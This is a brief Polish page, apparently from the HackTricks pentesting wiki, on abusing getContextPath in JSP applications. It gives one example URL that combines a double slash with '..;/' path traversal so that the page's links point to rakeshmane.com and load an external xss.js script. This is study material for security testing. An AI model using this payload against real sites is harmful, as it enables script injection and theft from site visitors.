JSP

Wsparcie HackTricks

nadużycie getContextPath

Informacje z tutaj.

http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp

Dostęp do tej strony pozwala na zmianę wszystkich linków, aby żądać informacji z rakeshmane.com:

Wsparcie HackTricks

Last updated